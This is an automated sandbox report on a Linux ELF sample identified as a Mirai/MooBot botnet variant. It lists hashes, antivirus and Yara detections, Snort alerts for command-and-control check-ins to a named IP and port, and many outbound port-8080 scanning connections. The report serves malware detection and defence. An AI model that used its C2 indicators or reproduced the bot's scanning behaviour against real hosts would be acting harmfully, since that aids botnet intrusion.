Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
HH5LnBFw1p.elf

Overview

General Information

Sample name:HH5LnBFw1p.elf
renamed because original name is a hash value
Original sample name:cde00166105fa6dbbef681f3d2af6926.elf
Analysis ID:1407281
MD5:cde00166105fa6dbbef681f3d2af6926
SHA1:64c6a39c144b9f1f0adaec014c3307d91b805ae7
SHA256:d1fdb7eb693c9f42f40047e83f613b82325cd7496055bb8cf8926fc54767af58
Tags:32elfmipsmirai
Infos:

Detection

Mirai
Score:84
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1407281
Start date and time:2024-03-12 08:49:43 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 0s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:HH5LnBFw1p.elf
renamed because original name is a hash value
Original Sample Name:cde00166105fa6dbbef681f3d2af6926.elf
Detection:MAL
Classification:mal84.troj.linELF@0/8@19/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/HH5LnBFw1p.elf
PID:5491
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
HH5LnBFw1p.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
  • 0x27348:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x2735c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27370:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27384:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27398:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x273ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x273c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x273d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x273e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x273fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27410:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27424:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27438:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x2744c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27460:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27474:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27488:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x2749c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x274b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x274c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x274d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
SourceRuleDescriptionAuthorStrings
5491.1.00007f1894400000.00007f189442b000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
  • 0x27348:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x2735c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27370:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27384:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27398:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x273ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x273c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x273d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x273e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x273fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27410:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27424:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27438:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x2744c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27460:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27474:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x27488:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x2749c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x274b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x274c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x274d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: HH5LnBFw1p.elf PID: 5491Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
  • 0x3c85:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3c99:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3cad:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3cc1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3cd5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3ce9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3cfd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3d11:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3d25:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3d39:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3d4d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3d61:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3d75:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3d89:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3d9d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3db1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3dc5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3dd9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3ded:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3e01:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
  • 0x3e15:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Timestamp:03/12/24-08:50:23.179662
SID:2030490
Source Port:46666
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:51:28.724252
SID:2030490
Source Port:48204
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:51:47.544788
SID:2030490
Source Port:55128
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:51:21.304314
SID:2030490
Source Port:46164
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:51:10.492620
SID:2030490
Source Port:43104
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:52:01.369338
SID:2030490
Source Port:59916
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:52:11.776812
SID:2030490
Source Port:34112
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:50:47.843556
SID:2030490
Source Port:34494
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:50:30.597926
SID:2030490
Source Port:49912
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:50:52.251620
SID:2030490
Source Port:36404
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:51:07.084180
SID:2030490
Source Port:41046
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:50:40.436267
SID:2030490
Source Port:57740
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:51:51.960129
SID:2030490
Source Port:57286
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:51:13.903369
SID:2030490
Source Port:43252
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:50:59.673177
SID:2030490
Source Port:39628
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:50:36.016868
SID:2030490
Source Port:54524
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:52:26.599134
SID:2030490
Source Port:37550
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:52:20.195409
SID:2030490
Source Port:36310
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:03/12/24-08:51:37.130760
SID:2030490
Source Port:52378
Destination Port:56789
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: HH5LnBFw1p.elfAvira: detected
Source: HH5LnBFw1p.elfReversingLabs: Detection: 65%
Source: HH5LnBFw1p.elfVirustotal: Detection: 46%Perma Link

Networking

barindex
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:46666 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:49912 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:54524 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:57740 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:34494 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:36404 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:39628 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:41046 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:43104 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:43252 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:46164 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:48204 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:52378 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:55128 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:57286 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:59916 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:34112 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:36310 -> 45.154.3.56:56789
Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:37550 -> 45.154.3.56:56789
Source: global trafficTCP traffic: 45.154.3.56 ports 56789,5,6,7,8,9
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 99.231.249.231:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 54.68.92.229:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 159.128.11.38:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 101.207.127.158:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 121.251.14.231:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 52.230.120.77:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 58.133.135.156:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 19.40.81.100:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 25.231.210.246:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 121.50.20.33:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 51.213.117.143:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 67.177.64.135:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 202.135.33.237:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 73.211.44.129:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 169.220.23.41:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 106.224.175.238:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 171.234.48.128:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 134.178.105.43:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 194.145.177.37:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 132.64.141.99:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 36.156.236.240:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 87.100.1.237:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 119.2.192.25:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 98.206.22.83:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 164.35.230.191:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 220.89.88.78:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 139.4.255.32:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 105.238.88.171:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 94.231.246.152:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 186.175.12.228:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 85.38.129.180:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 150.226.199.40:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 125.126.216.41:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 79.47.97.229:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 124.194.70.106:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 12.254.77.89:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 53.6.251.222:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 114.16.58.96:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 128.150.250.249:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 201.223.25.32:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 37.82.107.69:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 138.173.196.188:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 115.14.60.143:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 191.146.64.42:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 197.92.4.25:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 84.181.206.99:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 17.70.28.144:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 145.107.223.103:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 196.137.163.249:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 77.220.175.124:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 23.224.233.249:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 149.76.114.158:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 146.182.226.57:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 217.190.131.68:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 35.178.136.212:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 91.94.171.43:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 139.61.46.18:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 2.211.210.248:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 72.25.145.44:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 93.147.249.27:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 80.235.167.232:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 80.59.216.35:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 160.97.91.180:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 207.82.123.246:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 32.133.0.117:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 64.220.220.146:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 46.95.231.52:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 45.245.133.22:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 80.174.73.162:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 18.87.86.129:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 210.73.89.154:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 122.19.136.213:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 223.44.104.15:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 124.177.71.200:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 47.104.65.166:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 37.239.188.5:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 2.20.140.77:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 221.65.156.177:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 219.87.224.107:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 51.68.149.116:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 58.23.25.79:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 110.29.12.194:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 177.4.145.79:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 110.64.80.152:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 128.235.42.243:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 70.69.92.125:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 125.15.183.44:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 221.240.225.114:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 149.225.96.66:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 211.103.170.149:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 66.110.45.192:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 117.149.143.110:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 51.214.1.98:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 58.187.247.55:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 204.171.201.61:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 186.234.178.159:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 139.135.71.20:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 188.215.116.188:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 168.112.93.246:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 106.153.156.128:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 223.236.141.212:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 88.55.0.134:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 72.69.117.57:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 125.249.242.253:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 158.87.226.193:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 120.143.165.172:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 38.215.24.93:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 91.175.61.174:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 59.86.194.37:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 199.153.130.99:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 147.48.78.24:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 153.165.198.67:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 59.81.118.32:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 185.66.83.240:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 221.236.141.240:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 136.97.92.9:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 197.17.130.116:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 45.226.253.13:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 142.108.205.12:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 95.141.244.223:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 97.168.193.123:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 145.229.216.218:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 59.89.198.140:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 78.21.175.177:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 63.174.24.248:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 68.234.16.106:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 139.95.158.222:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 40.122.19.55:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 51.65.37.4:8080
Source: global trafficTCP traffic: 192.168.2.14:22741 -> 8.44.133.149:8080
